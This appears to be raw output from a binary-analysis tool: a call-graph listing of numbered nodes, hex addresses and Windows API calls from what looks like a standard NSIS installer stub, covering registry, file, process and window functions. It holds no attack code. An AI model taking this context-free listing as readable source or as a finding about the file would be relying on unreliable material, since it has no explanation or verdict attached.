GlobalFree 4812->4814 4813->4814 4817 402369 4813->4817 4814->4815 4821 405f51 wsprintfW 4817->4821 4819 402375 4822 405f51 wsprintfW 4819->4822 4821->4819 4822->4814 4823 402afd 4824 40145c 18 API calls 4823->4824 4825 402b04 4824->4825 4830 405e50 GetFileAttributesW CreateFileW 4825->4830 4827 402b10 4828 4030e3 4827->4828 4831 405f51 wsprintfW 4827->4831 4830->4827 4831->4828 4832 4029ff 4833 401553 19 API calls 4832->4833 4834 402a09 4833->4834 4835 40145c 18 API calls 4834->4835 4836 402a12 4835->4836 4837 402a1f RegQueryValueExW 4836->4837 4839 401a13 4836->4839 4838 402a3f 4837->4838 4842 402a45 4837->4842 4838->4842 4843 405f51 wsprintfW 4838->4843 4841 4029e4 RegCloseKey 4841->4839 4842->4839 4842->4841 4843->4842 4844 401000 4845 401037 BeginPaint GetClientRect 4844->4845 4846 40100c DefWindowProcW 4844->4846 4848 4010fc 4845->4848 4849 401182 4846->4849 4850 401073 CreateBrushIndirect FillRect DeleteObject 4848->4850 4851 401105 4848->4851 4850->4848 4852 401170 EndPaint 4851->4852 4853 40110b CreateFontIndirectW 4851->4853 4852->4849 4853->4852 4854 40111b 6 API calls 4853->4854 4854->4852 4855 401f80 4856 401446 18 API calls 4855->4856 4857 401f88 4856->4857 4858 401446 18 API calls 4857->4858 4859 401f93 4858->4859 4860 401fa3 4859->4860 4861 40145c 18 API calls 4859->4861 4862 401fb3 4860->4862 4863 40145c 18 API calls 4860->4863 4861->4860 4864 402006 4862->4864 4865 401fbc 4862->4865 4863->4862 4867 40145c 18 API calls 4864->4867 4866 401446 18 API calls 4865->4866 4869 401fc4 4866->4869 4868 40200d 4867->4868 4870 40145c 18 API calls 4868->4870 4871 401446 18 API calls 4869->4871 4872 402016 FindWindowExW 4870->4872 4873 401fce 4871->4873 4877 402036 4872->4877 4874 401ff6 SendMessageW 4873->4874 4875 401fd8 SendMessageTimeoutW 4873->4875 4874->4877 4875->4877 4876 4030e3 4877->4876 4879 405f51 wsprintfW 4877->4879 4879->4876 4880 402880 4881 402884 4880->4881 4882 40145c 18 API calls 4881->4882 4883 4028a7 4882->4883 4884 40145c 18 API calls 4883->4884 4885 4028b1 4884->4885 4886 4028ba RegCreateKeyExW 4885->4886 4887 4028e8 4886->4887 4894 4029ef 4886->4894 4888 402934 4887->4888 4889 40145c 18 API calls 4887->4889 4890 402963 4888->4890 4893 401446 18 API calls 4888->4893 4892 4028fc lstrlenW 4889->4892 4891 4029ae RegSetValueExW 4890->4891 4895 40337f 37 API calls 4890->4895 4898 4029c6 RegCloseKey 4891->4898 4899 4029cb 4891->4899 4896 402918 4892->4896 4897 40292a 4892->4897 4900 402947 4893->4900 4901 40297b 4895->4901 4902 4062a3 11 API calls 4896->4902 4903 4062a3 11 API calls 4897->4903 4898->4894 4904 4062a3 11 API calls 4899->4904 4905 4062a3 11 API calls 4900->4905 4911 406224 4901->4911 4907 402922 4902->4907 4903->4888 4904->4898 4905->4890 4907->4891 4910 4062a3 11 API calls 4910->4907 4912 406247 4911->4912 4913 40628a 4912->4913 4914 40625c wsprintfW 4912->4914 4915 402991 4913->4915 4916 406293 lstrcatW 4913->4916 4914->4913 4914->4914 4915->4910 4916->4915 4917 402082 4918 401446 18 API calls 4917->4918 4919 402093 SetWindowLongW 4918->4919 4920 4030e3 4919->4920 3462 403883 #17 SetErrorMode OleInitialize 3536 4062fc GetModuleHandleA 3462->3536 3466 4038f1 GetCommandLineW 3541 406009 lstrcpynW 3466->3541 3468 403903 GetModuleHandleW 3469 40391b 3468->3469 3542 405d06 3469->3542 3472 4039d6 3473 4039f5 GetTempPathW 3472->3473 3546 4037cc 3473->3546 3475 403a0b 3476 403a33 DeleteFileW 3475->3476 3477 403a0f GetWindowsDirectoryW lstrcatW 3475->3477 3554 403587 GetTickCount GetModuleFileNameW 3476->3554 3479 4037cc 11 API calls 3477->3479 3478 405d06 CharNextW 3485 40393c 3478->3485 3481 403a2b 3479->3481 3481->3476 3483 403acc 3481->3483 3482 403a47 3482->3483 3486 403ab1 3482->3486 3487 405d06 CharNextW 3482->3487 3640 403859 3483->3640 3485->3472 3485->3478 3493 4039d8 3485->3493 3582 40592c 3486->3582 3499 403a5e 3487->3499 3491 403ae1 3647 405ca0 3491->3647 3492 403bce 3495 403c51 3492->3495 3497 4062fc 3 API calls 3492->3497 3651 406009 lstrcpynW 3493->3651 3501 403bdd 3497->3501 3502 403af7 lstrcatW lstrcmpiW 3499->3502 3503 403a89 3499->3503 3504 4062fc 3 API calls 3501->3504 3502->3483 3506 403b13 CreateDirectoryW SetCurrentDirectoryW 3502->3506 3652 40677e 3503->3652 3507 403be6 3504->3507 3509 403b36 3506->3509 3510 403b2b 3506->3510 3511 4062fc 3 API calls 3507->3511 3682 406009 lstrcpynW 3509->3682 3681 406009 lstrcpynW 3510->3681 3515 403bef 3511->3515 3514 403b44 3683 406009 lstrcpynW 3514->3683 3518 403c3d ExitWindowsEx 3515->3518 3523 403bfd GetCurrentProcess 3515->3523 3518->3495 3520 403c4a 3518->3520 3519 403aa6 3667 406009 lstrcpynW 3519->3667 3711 40141d 3520->3711 3526 403c0d 3523->3526 3526->3518 3527 403b79 CopyFileW 3529 403b53 3527->3529 3528 403bc2 3530 406c68 42 API calls 3528->3530 3529->3528 3533 406805 18 API calls 3529->3533 3535 403bad CloseHandle 3529->3535 3684 406805 3529->3684 3703 406c68 3529->3703 3708 405c3f CreateProcessW 3529->3708 3532 403bc9 3530->3532 3532->3483 3533->3529 3535->3529 3537 406314 LoadLibraryA 3536->3537 3538 40631f GetProcAddress 3536->3538 3537->3538 3539 4038c6 SHGetFileInfoW 3537->3539 3538->3539 3540 406009 lstrcpynW 3539->3540 3540->3466 3541->3468 3543 405d0c 3542->3543 3544 40392a CharNextW 3543->3544 3545 405d13 CharNextW 3543->3545 3544->3485 3545->3543 3714 406038 3546->3714 3548 4037e2 3548->3475 3549 4037d8 3549->3548 3723 406722 lstrlenW CharPrevW 3549->3723 3730 405e50 GetFileAttributesW CreateFileW 3554->3730 3556 4035c7 3577 4035d7 3556->3577 3731 406009 lstrcpynW 3556->3731 3558 4035ed 3732 406751 lstrlenW 3558->3732 3562 4035fe GetFileSize 3563 4036fa 3562->3563 3576 403615 3562->3576 3739 4032d2 3563->3739 3565 403703 3567 40373f GlobalAlloc 3565->3567 3565->3577 3773 403368 SetFilePointer 3565->3773 3750 403368 SetFilePointer 3567->3750 3569 4037bd 3573 4032d2 6 API calls 3569->3573 3571 40375a 3751 40337f 3571->3751 3572 403720 3575 403336 ReadFile 3572->3575 3573->3577 3578 40372b 3575->3578 3576->3563 3576->3569 3576->3577 3579 4032d2 6 API calls 3576->3579 3737 403336 ReadFile 3576->3737 3577->3482 3578->3567 3578->3577 3579->3576 3580 403766 3580->3577 3580->3580 3581 403794 SetFilePointer 3580->3581 3581->3577 3583 4062fc 3 API calls 3582->3583 3584 405940 3583->3584 3585 405946 3584->3585 3586 405958 3584->3586 3806 405f51 wsprintfW 3585->3806 3807 405ed3 RegOpenKeyExW 3586->3807 3590 4059a8 lstrcatW 3592 405956 3590->3592 3591 405ed3 3 API calls 3591->3590 3797 403e95 3592->3797 3595 40677e 18 API calls 3596 4059da 3595->3596 3597 405a70 3596->3597 3599 405ed3 3 API calls 3596->3599 3598 40677e 18 API calls 3597->3598 3600 405a76 3598->3600 3601 405a0c 3599->3601 3602 405a86 3600->3602 3603 406805 18 API calls 3600->3603 3601->3597 3607 405a2f lstrlenW 3601->3607 3613 405d06 CharNextW 3601->3613 3604 405aa6 LoadImageW 3602->3604 3813 403e74 3602->3813 3603->3602 3605 405ad1 RegisterClassW 3604->3605 3606 405b66 3604->3606 3611 405b19 SystemParametersInfoW CreateWindowExW 3605->3611 3614 403ac1 3605->3614 3612 40141d 80 API calls 3606->3612 3608 405a63 3607->3608 3609 405a3d lstrcmpiW 3607->3609 3617 406722 3 API calls 3608->3617 3609->3608 3615 405a4d GetFileAttributesW 3609->3615 3611->3606 3618 405b6c 3612->3618 3619 405a2a 3613->3619 3668 4060e7 3614->3668 3620 405a59 3615->3620 3616 405a9c 3616->3604 3621 405a69 3617->3621 3618->3614 3624 403e95 19 API calls 3618->3624 3619->3607 3620->3608 3622 406751 2 API calls 3620->3622 3812 406009 lstrcpynW 3621->3812 3622->3608 3625 405b7d 3624->3625 3626 405b89 ShowWindow LoadLibraryW 3625->3626 3627 405c0c 3625->3627 3629 405ba8 LoadLibraryW 3626->3629 3630 405baf GetClassInfoW 3626->3630 3818 405047 OleInitialize 3627->3818 3629->3630 3631 405bc3 GetClassInfoW RegisterClassW 3630->3631 3632 405bd9 DialogBoxParamW 3630->3632 3631->3632 3634 40141d 80 API calls 3632->3634 3633 405c12 3635 405c16 3633->3635 3636 405c2e 3633->3636 3637 405c01 3634->3637 3635->3614 3639 40141d 80 API calls 3635->3639 3638 40141d 80 API calls 3636->3638 3637->3614 3638->3614 3639->3614 3641 403871 3640->3641 3642 403863 CloseHandle 3640->3642 3966 403c83 3641->3966 3642->3641 3648 405cb5 3647->3648 3649 403aef ExitProcess 3648->3649 3650 405ccb MessageBoxIndirectW 3648->3650 3650->3649 3651->3473 4023 406009 lstrcpynW 3652->4023 3654 40678f 3655 405d59 4 API calls 3654->3655 3656 406795 3655->3656 3657 406038 5 API calls 3656->3657 3664 403a97 3656->3664 3663 4067a5 3657->3663 3658 4067dd lstrlenW 3659 4067e4 3658->3659 3658->3663 3660 406722 3 API calls 3659->3660 3662 4067ea GetFileAttributesW 3660->3662 3661 4062d5 2 API calls 3661->3663 3662->3664 3663->3658 3663->3661 3663->3664 3665 406751 2 API calls 3663->3665 3664->3483 3666 406009 lstrcpynW 3664->3666 3665->3658 3666->3519 3667->3486 3669 406110 3668->3669 3670 4060f3 3668->3670 3672 406187 3669->3672 3673 40612d 3669->3673 3676 406104 3669->3676 3671 4060fd CloseHandle 3670->3671 3670->3676 3671->3676 3674 406190 lstrcatW lstrlenW WriteFile 3672->3674 3672->3676 3673->3674 3675 406136 GetFileAttributesW 3673->3675 3674->3676 4024 405e50 GetFileAttributesW CreateFileW 3675->4024 3676->3483 3678 406152 3678->3676 3679 406162 WriteFile 3678->3679 3680 40617c SetFilePointer 3678->3680 3679->3680 3680->3672 3681->3509 3682->3514 3683->3529 3697 406812 3684->3697 3685 406a7f 3686 403b6c DeleteFileW 3685->3686 4027 406009 lstrcpynW 3685->4027 3686->3527 3686->3529 3688 4068d3 GetVersion 3700 4068e0 3688->3700 3689 406a46 lstrlenW 3689->3697 3690 406805 10 API calls 3690->3689 3693 405ed3 3 API calls 3693->3700 3694 406952 GetSystemDirectoryW 3694->3700 3695 406965 GetWindowsDirectoryW 3695->3700 3696 406038 5 API calls 3696->3697 3697->3685 3697->3688 3697->3689 3697->3690 3697->3696 4025 405f51 wsprintfW 3697->4025 4026 406009 lstrcpynW 3697->4026 3698 406805 10 API calls 3698->3700 3699 4069df lstrcatW 3699->3697 3700->3693 3700->3694 3700->3695 3700->3697 3700->3698 3700->3699 3701 406999 SHGetSpecialFolderLocation 3700->3701 3701->3700 3702 4069b1 SHGetPathFromIDListW CoTaskMemFree 3701->3702 3702->3700 3704 4062fc 3 API calls 3703->3704 3705 406c6f 3704->3705 3707 406c90 3705->3707 4028 406a99 lstrcpyW 3705->4028 3707->3529 3709 405c7a 3708->3709 3710 405c6e CloseHandle 3708->3710 3709->3529 3710->3709 3712 40139d 80 API calls 3711->3712 3713 401432 3712->3713 3713->3495 3720 406045 3714->3720 3715 4060bb 3716 4060c1 CharPrevW 3715->3716 3718 4060e1 3715->3718 3716->3715 3717 4060ae CharNextW 3717->3715 3717->3720 3718->3549 3719 405d06 CharNextW 3719->3720 3720->3715 3720->3717 3720->3719 3721 40609a CharNextW 3720->3721 3722 4060a9 CharNextW 3720->3722 3721->3720 3722->3717 3724 4037ea CreateDirectoryW 3723->3724 3725 40673f lstrcatW 3723->3725 3726 405e7f 3724->3726 3725->3724 3727 405e8c GetTickCount GetTempFileNameW 3726->3727 3728 405ec2 3727->3728 3729 4037fe 3727->3729 3728->3727 3728->3729 3729->3475 3730->3556 3731->3558 3733 406760 3732->3733 3734 4035f3 3733->3734 3735 406766 CharPrevW 3733->3735 3736 406009 lstrcpynW 3734->3736 3735->3733 3735->3734 3736->3562 3738 403357 3737->3738 3738->3576 3740 4032f3 3739->3740 3741 4032db 3739->3741 3744 403303 GetTickCount 3740->3744 3745 4032fb 3740->3745 3742 4032e4 DestroyWindow 3741->3742 3743 4032eb 3741->3743 3742->3743 3743->3565 3747 403311 CreateDialogParamW ShowWindow 3744->3747 3748 403334 3744->3748 3774 406332 3745->3774 3747->3748 3748->3565 3750->3571 3753 403398 3751->3753 3752 4033c3 3755 403336 ReadFile 3752->3755 3753->3752 3785 403368 SetFilePointer 3753->3785 3756 4033ce 3755->3756 3757 4033e7 GetTickCount 3756->3757 3758 403518 3756->3758 3760 4033d2 3756->3760 3770 4033fa 3757->3770 3759 40351c 3758->3759 3764 403540 3758->3764 3761 403336 ReadFile 3759->3761 3760->3580 3761->3760 3762 403336 ReadFile 3762->3764 3763 403336 ReadFile 3763->3770 3764->3760 3764->3762 3765 40355f WriteFile 3764->3765 3765->3760 3766 403574 3765->3766 3766->3760 3766->3764 3768 40345c GetTickCount 3768->3770 3769 403485 MulDiv wsprintfW 3786 404f72 3769->3786 3770->3760 3770->3763 3770->3768 3770->3769 3772 4034c9 WriteFile 3770->3772 3778 407312 3770->3778 3772->3760 3772->3770 3773->3572 3775 40634f PeekMessageW 3774->3775 3776 406345 DispatchMessageW 3775->3776 3777 403301 3775->3777 3776->3775 3777->3565 3779 407332 3778->3779 3780 40733a 3778->3780 3779->3770 3780->3779 3781 4073c2 GlobalFree 3780->3781 3782 4073cb GlobalAlloc 3780->3782 3783 407443 GlobalAlloc 3780->3783 3784 40743a GlobalFree 3780->3784 3781->3782 3782->3779 3782->3780 3783->3779 3783->3780 3784->3783 3785->3752 3787 404f8b 3786->3787 3796 40502f 3786->3796 3788 404fa9 lstrlenW 3787->3788 3789 406805 18 API calls 3787->3789 3790 404fd2 3788->3790 3791 404fb7 lstrlenW 3788->3791 3789->3788 3793 404fe5 3790->3793 3794 404fd8 SetWindowTextW 3790->3794 3792 404fc9 lstrcatW 3791->3792 3791->3796 3792->3790 3795 404feb SendMessageW SendMessageW SendMessageW 3793->3795 3793->3796 3794->3793 3795->3796 3796->3770 3798 403ea9 3797->3798 3826 405f51 wsprintfW 3798->3826 3800 403f1d 3801 406805 18 API calls 3800->3801 3802 403f29 SetWindowTextW 3801->3802 3804 403f44 3802->3804 3803 403f5f 3803->3595 3804->3803 3805 406805 18 API calls 3804->3805 3805->3804 3806->3592 3808 405f07 RegQueryValueExW 3807->3808 3809 405989 3807->3809 3810 405f29 RegCloseKey 3808->3810 3809->3590 3809->3591 3810->3809 3812->3597 3827 406009 lstrcpynW 3813->3827 3815 403e88 3816 406722 3 API calls 3815->3816 3817 403e8e lstrcatW 3816->3817 3817->3616 3828 403daf 3818->3828 3820 40506a 3823 4062a3 11 API calls 3820->3823 3825 405095 3820->3825 3831 40139d 3820->3831 3821 403daf SendMessageW 3822 4050a5 OleUninitialize 3821->3822 3822->3633 3823->3820 3825->3821 3826->3800 3827->3815 3829 403dc7 3828->3829 3830 403db8 SendMessageW 3828->3830 3829->3820 3830->3829 3834 4013a4 3831->3834 3832 401410 3832->3820 3834->3832 3835 4013dd MulDiv SendMessageW 3834->3835 3836 4015a0 3834->3836 3835->3834 3837 4015fa 3836->3837 3916 40160c 3836->3916 3838 401601 3837->3838 3839 401742 3837->3839 3840 401962 3837->3840 3841 4019ca 3837->3841 3842 40176e 3837->3842 3843 401650 3837->3843 3844 4017b1 3837->3844 3845 401672 3837->3845 3846 401693 3837->3846 3847 401616 3837->3847 3848 4016d6 3837->3848 3849 401736 3837->3849 3850 401897 3837->3850 3851 4018db 3837->3851 3852 40163c 3837->3852 3853 4016bd 3837->3853 3837->3916 3866 4062a3 11 API calls 3838->3866 3858 401751 ShowWindow 3839->3858 3859 401758 3839->3859 3863 40145c 18 API calls 3840->3863 3856 40145c 18 API calls 3841->3856 3860 40145c 18 API calls 3842->3860 3943 4062a3 lstrlenW wvsprintfW 3843->3943 3949 40145c 3844->3949 3861 40145c 18 API calls 3845->3861 3946 401446 3846->3946 3855 40145c 18 API calls 3847->3855 3872 401446 18 API calls 3848->3872 3848->3916 3849->3916 3965 405f51 wsprintfW 3849->3965 3862 40145c 18 API calls 3850->3862 3867 40145c 18 API calls 3851->3867 3857 401647 PostQuitMessage 3852->3857 3852->3916 3854 4062a3 11 API calls 3853->3854 3869 4016c7 SetForegroundWindow 3854->3869 3870 40161c 3855->3870 3871 4019d1 SearchPathW 3856->3871 3857->3916 3858->3859 3873 401765 ShowWindow 3859->3873 3859->3916 3874 401775 3860->3874 3875 401678 3861->3875 3876 40189d 3862->3876 3877 401968 GetFullPathNameW 3863->3877 3866->3916 3868 4018e2 3867->3868 3880 40145c 18 API calls 3868->3880 3869->3916 3881 4062a3 11 API calls 3870->3881 3871->3916 3872->3916 3873->3916 3884 4062a3 11 API calls 3874->3884 3885 4062a3 11 API calls 3875->3885 3961 4062d5 FindFirstFileW 3876->3961 3887 40197f 3877->3887 3929 4019a1 3877->3929 3879 40169a 3889 4062a3 11 API calls 3879->3889 3890 4018eb 3880->3890 3891 401627 3881->3891 3893 401785 SetFileAttributesW 3884->3893 3894 401683 3885->3894 3911 4062d5 2 API calls 3887->3911 3887->3929 3888 4062a3 11 API calls 3896 4017c9 3888->3896 3897 4016a7 Sleep 3889->3897 3899 40145c 18 API calls 3890->3899 3900 404f72 25 API calls 3891->3900 3902 40179a 3893->3902 3893->3916 3909 404f72 25 API calls 3894->3909 3954 405d59 CharNextW CharNextW 3896->3954 3897->3916 3898 4019b8 GetShortPathNameW 3898->3916 3907 4018f5 3899->3907 3900->3916 3901 40139d 65 API calls 3901->3916 3908 4062a3 11 API calls 3902->3908 3903 4018c2 3912 4062a3 11 API calls 3903->3912 3904 4018a9 3910 4062a3 11 API calls 3904->3910 3914 4062a3 11 API calls 3907->3914 3908->3916 3909->3916 3910->3916 3915 401991 3911->3915 3912->3916 3913 4017d4 3917 401864 3913->3917 3920 405d06 CharNextW 3913->3920 3938 4062a3 11 API calls 3913->3938 3918 401902 MoveFileW 3914->3918 3915->3929 3964 406009 lstrcpynW 3915->3964 3916->3834 3917->3894 3919 40186e 3917->3919 3921 401912 3918->3921 3922 40191e 3918->3922 3923 404f72 25 API calls 3919->3923 3925 4017e6 CreateDirectoryW 3920->3925 3921->3894 3927 401942 3922->3927 3932 4062d5 2 API calls 3922->3932 3928 401875 3923->3928 3925->3913 3926 4017fe GetLastError 3925->3926 3930 401827 GetFileAttributesW 3926->3930 3931 40180b GetLastError 3926->3931 3937 4062a3 11 API calls 3927->3937 3960 406009 lstrcpynW 3928->3960 3929->3898 3929->3916 3930->3913 3934 4062a3 11 API calls 3931->3934 3935 401929 3932->3935 3934->3913 3935->3927 3940 406c68 42 API calls 3935->3940 3936 401882 SetCurrentDirectoryW 3936->3916 3939 40195c 3937->3939 3938->3913 3939->3916 3941 401936 3940->3941 3942 404f72 25 API calls 3941->3942 3942->3927 3944 4060e7 9 API calls 3943->3944 3945 401664 3944->3945 3945->3901 3947 406805 18 API calls 3946->3947 3948 401455 3947->3948 3948->3879 3950 406805 18 API calls 3949->3950 3951 401488 3950->3951 3952 401497 3951->3952 3953 406038 5 API calls 3951->3953 3952->3888 3953->3952 3955 405d76 3954->3955 3956 405d88 3954->3956 3955->3956 3957 405d83 CharNextW 3955->3957 3958 405dac 3956->3958 3959 405d06 CharNextW 3956->3959 3957->3958 3958->3913 3959->3956 3960->3936 3962 4018a5 3961->3962 3963 4062eb FindClose 3961->3963 3962->3903 3962->3904 3963->3962 3964->3929 3965->3916 3967 403c91 3966->3967 3968 403876 3967->3968 3969 403c96 FreeLibrary GlobalFree 3967->3969 3970 406c9b 3968->3970 3969->3968 3969->3969 3971 40677e 18 API calls 3970->3971 3972 406cae 3971->3972 3973 406cb7 DeleteFileW 3972->3973 3974 406cce 3972->3974 4014 403882 OleUninitialize 3973->4014 3975 406e4b 3974->3975 4018 406009 lstrcpynW 3974->4018 3981 4062d5 2 API calls 3975->3981 4003 406e58 3975->4003 3975->4014 3977 406cf9 3978 406d03 lstrcatW 3977->3978 3979 406d0d 3977->3979 3980 406d13 3978->3980 3982 406751 2 API calls 3979->3982 3984 406d23 lstrcatW 3980->3984 3985 406d19 3980->3985 3983 406e64 3981->3983 3982->3980 3988 406722 3 API calls 3983->3988 3983->4014 3987 406d2b lstrlenW FindFirstFileW 3984->3987 3985->3984 3985->3987 3986 4062a3 11 API calls 3986->4014 3989 406e3b 3987->3989 3993 406d52 3987->3993 3990 406e6e 3988->3990 3989->3975 3992 4062a3 11 API calls 3990->3992 3991 405d06 CharNextW 3991->3993 3994 406e79 3992->3994 3993->3991 3997 406e18 FindNextFileW 3993->3997 4006 406c9b 72 API calls 3993->4006 4013 404f72 25 API calls 3993->4013 4015 4062a3 11 API calls 3993->4015 4016 404f72 25 API calls 3993->4016 4017 406c68 42 API calls 3993->4017 4019 406009 lstrcpynW 3993->4019 4020 405e30 GetFileAttributesW 3993->4020 3995 405e30 2 API calls 3994->3995 3996 406e81 RemoveDirectoryW 3995->3996 4000 406ec4 3996->4000 4001 406e8d 3996->4001 3997->3993 3999 406e30 FindClose 3997->3999 3999->3989 4002 404f72 25 API calls 4000->4002 4001->4003 4004 406e93 4001->4004 4002->4014 4003->3986 4005 4062a3 11 API calls 4004->4005 4007 406e9d 4005->4007 4006->3993 4009 404f72 25 API calls 4007->4009 4011 406ea7 4009->4011 4012 406c68 42 API calls 4011->4012 4012->4014 4013->3997 4014->3491 4014->3492 4015->3993 4016->3993 4017->3993 4018->3977 4019->3993 4021 405e4d DeleteFileW 4020->4021 4022 405e3f SetFileAttributesW 4020->4022 4021->3993 4022->4021 4023->3654 4024->3678 4025->3697 4026->3697 4027->3686 4029 406ae7 GetShortPathNameW 4028->4029 4030 406abe 4028->4030 4031 406b00 4029->4031 4032 406c62 4029->4032 4054 405e50 GetFileAttributesW CreateFileW 4030->4054 4031->4032 4034 406b08 WideCharToMultiByte 4031->4034 4032->3707 4034->4032 4036 406b25 WideCharToMultiByte 4034->4036 4035 406ac7 CloseHandle GetShortPathNameW 4035->4032 4037 406adf 4035->4037 4036->4032 4038 406b3d wsprintfA 4036->4038 4037->4029 4037->4032 4039 406805 18 API calls 4038->4039 4040 406b69 4039->4040 4055 405e50 GetFileAttributesW CreateFileW 4040->4055 4042 406b76 4042->4032 4043 406b83 GetFileSize GlobalAlloc 4042->4043 4044 406ba4 ReadFile 4043->4044 4045 406c58 CloseHandle 4043->4045 4044->4045 4046 406bbe 4044->4046 4045->4032 4046->4045 4056 405db6 lstrlenA 4046->4056 4049 406bd7 lstrcpyA 4052 406bf9 4049->4052 4050 406beb 4051 405db6 4 API calls 4050->4051 4051->4052 4053 406c30 SetFilePointer WriteFile GlobalFree 4052->4053 4053->4045 4054->4035 4055->4042 4057 405df7 lstrlenA 4056->4057 4058 405dd0 lstrcmpiA 4057->4058 4059 405dff 4057->4059 4058->4059 4060 405dee CharNextA 4058->4060 4059->4049 4059->4050 4060->4057 4921 402a84 4922 401553 19 API calls 4921->4922 4923 402a8e 4922->4923 4924 401446 18 API calls 4923->4924 4925 402a98 4924->4925 4926 401a13 4925->4926 4927 402ab2 RegEnumKeyW 4925->4927 4928 402abe RegEnumValueW 4925->4928 4929 402a7e 4927->4929 4928->4926 4928->4929 4929->4926 4930 4029e4 RegCloseKey 4929->4930 4930->4926 4931 402c8a 4932 402ca2 4931->4932 4933 402c8f 4931->4933 4935 40145c 18 API calls 4932->4935 4934 401446 18 API calls 4933->4934 4937 402c97 4934->4937 4936 402ca9 lstrlenW 4935->4936 4936->4937 4938 402ccb WriteFile 4937->4938 4939 401a13 4937->4939 4938->4939 4940 40400d 4941 40406a 4940->4941 4942 40401a lstrcpynA lstrlenA 4940->4942 4942->4941 4943 40404b 4942->4943 4943->4941 4944 404057 GlobalFree 4943->4944 4944->4941 4945 401d8e 4946 40145c 18 API calls 4945->4946 4947 401d95 ExpandEnvironmentStringsW 4946->4947 4948 401da8 4947->4948 4950 401db9 4947->4950 4949 401dad lstrcmpW 4948->4949 4948->4950 4949->4950 4951 401e0f 4952 401446 18 API calls 4951->4952 4953 401e17 4952->4953 4954 401446 18 API calls 4953->4954 4955 401e21 4954->4955 4956 4030e3 4955->4956 4958 405f51 wsprintfW 4955->4958 4958->4956 4959 402392 4960 40145c 18 API calls 4959->4960 4961 402399 4960->4961 4964 4071f8 4961->4964 4965 406ed2 25 API calls 4964->4965 4966 407218 4965->4966 4967 407222 lstrcpynW lstrcmpW 4966->4967 4968 4023a7 4966->4968 4969 407254 4967->4969 4970 40725a lstrcpynW 4967->4970 4969->4970 4970->4968 4971 402713 4986 406009 lstrcpynW 4971->4986 4973 40272c 4987 406009 lstrcpynW 4973->4987 4975 402738 4976 40145c 18 API calls 4975->4976 4978 402743 4975->4978 4976->4978 4977 402752 4980 40145c 18 API calls 4977->4980 4982 402761 4977->4982 4978->4977 4979 40145c 18 API calls 4978->4979 4979->4977 4980->4982 4981 40145c 18 API calls 4983 40276b 4981->4983 4982->4981 4984 4062a3 11 API calls 4983->4984 4985 40277f WritePrivateProfileStringW 4984->4985 4986->4973 4987->4975 4988 402797 4989 40145c 18 API calls 4988->4989 4990 4027ae 4989->4990 4991 40145c 18 API calls 4990->4991 4992 4027b7 4991->4992 4993 40145c 18 API calls 4992->4993 4994 4027c0 GetPrivateProfileStringW lstrcmpW 4993->4994 4995 402e18 4996 40145c 18 API calls 4995->4996 4997 402e1f FindFirstFileW 4996->4997 4998 402e32 4997->4998 5003 405f51 wsprintfW 4998->5003 5000 402e43 5004 406009 lstrcpynW 5000->5004 5002 402e50 5003->5000 5004->5002 5005 401e9a 5006 40145c 18 API calls 5005->5006 5007 401ea1 5006->5007 5008 401446 18 API calls 5007->5008 5009 401eab wsprintfW 5008->5009 4110 401a1f 4111 40145c 18 API calls 4110->4111 4112 401a26 4111->4112 4113 4062a3 11 API calls 4112->4113 4114 401a49 4113->4114 4115 401a64 4114->4115 4116 401a5c 4114->4116 4164 406009 lstrcpynW 4115->4164 4163 406009 lstrcpynW 4116->4163 4119 401a62 4123 406038 5 API calls 4119->4123 4120 401a6f 4121 406722 3 API calls 4120->4121 4122 401a75 lstrcatW 4121->4122 4122->4119 4125 401a81 4123->4125 4124 4062d5 2 API calls 4124->4125 4125->4124 4126 405e30 2 API calls 4125->4126 4128 401a98 CompareFileTime 4125->4128 4129 401ba9 4125->4129 4133 4062a3 11 API calls 4125->4133 4137 406009 lstrcpynW 4125->4137 4143 406805 18 API calls 4125->4143 4150 405ca0 MessageBoxIndirectW 4125->4150 4154 401b50 4125->4154 4161 401b5d 4125->4161 4162 405e50 GetFileAttributesW CreateFileW 4125->4162 4126->4125 4128->4125 4130 404f72 25 API calls 4129->4130 4132 401bb3 4130->4132 4131 404f72 25 API calls 4134 401b70 4131->4134 4135 40337f 37 API calls 4132->4135 4133->4125 4138 4062a3 11 API calls 4134->4138 4136 401bc6 4135->4136 4139 4062a3 11 API calls 4136->4139 4137->4125 4145 401b8b 4138->4145 4140 401bda 4139->4140 4141 401be9 SetFileTime 4140->4141 4142 401bf8 FindCloseChangeNotification 4140->4142 4141->4142 4144 401c09 4142->4144 4142->4145 4143->4125 4146 401c21 4144->4146 4147 401c0e 4144->4147 4149 406805 18 API calls 4146->4149 4148 406805 18 API calls 4147->4148 4151 401c16 lstrcatW 4148->4151 4152 401c29 4149->4152 4150->4125 4151->4152 4153 4062a3 11 API calls 4152->4153 4155 401c34 4153->4155 4156 401b93 4154->4156 4157 401b53 4154->4157 4158 405ca0 MessageBoxIndirectW 4155->4158 4159 4062a3 11 API calls 4156->4159 4160 4062a3 11 API calls 4157->4160 4158->4145 4159->4145 4160->4161 4161->4131 4162->4125 4163->4119 4164->4120 5010 40209f GetDlgItem GetClientRect 5011 40145c 18 API calls 5010->5011 5012 4020cf LoadImageW SendMessageW 5011->5012 5013 4030e3 5012->5013 5014 4020ed DeleteObject 5012->5014 5014->5013 5015 402b9f 5016 401446 18 API calls 5015->5016 5021 402ba7 5016->5021 5017 402c4a 5018 402bdf ReadFile 5020 402c3d 5018->5020 5018->5021 5019 401446 18 API calls 5019->5020 5020->5017 5020->5019 5027 402d17 ReadFile 5020->5027 5021->5017 5021->5018 5021->5020 5022 402c06 MultiByteToWideChar 5021->5022 5023 402c3f 5021->5023 5025 402c4f 5021->5025 5022->5021 5022->5025 5028 405f51 wsprintfW 5023->5028 5025->5020 5026 402c6b SetFilePointer 5025->5026 5026->5020 5027->5020 5028->5017 5029 402b23 GlobalAlloc 5030 402b39 5029->5030 5031 402b4b 5029->5031 5032 401446 18 API calls 5030->5032 5033 40145c 18 API calls 5031->5033 5034 402b41 5032->5034 5035 402b52 WideCharToMultiByte lstrlenA 5033->5035 5036 402b93 5034->5036 5037 402b84 WriteFile 5034->5037 5035->5034 5037->5036 5038 402384 GlobalFree 5037->5038 5038->5036 5040 4044a5 5041 404512 5040->5041 5042 4044df 5040->5042 5044 40451f GetDlgItem GetAsyncKeyState 5041->5044 5051 4045b1 5041->5051 5108 405c84 GetDlgItemTextW 5042->5108 5047 40453e GetDlgItem 5044->5047 5054 40455c 5044->5054 5045 4044ea 5048 406038 5 API calls 5045->5048 5046 40469d 5106 404833 5046->5106 5110 405c84 GetDlgItemTextW 5046->5110 5049 403d3f 19 API calls 5047->5049 5050 4044f0 5048->5050 5053 404551 ShowWindow 5049->5053 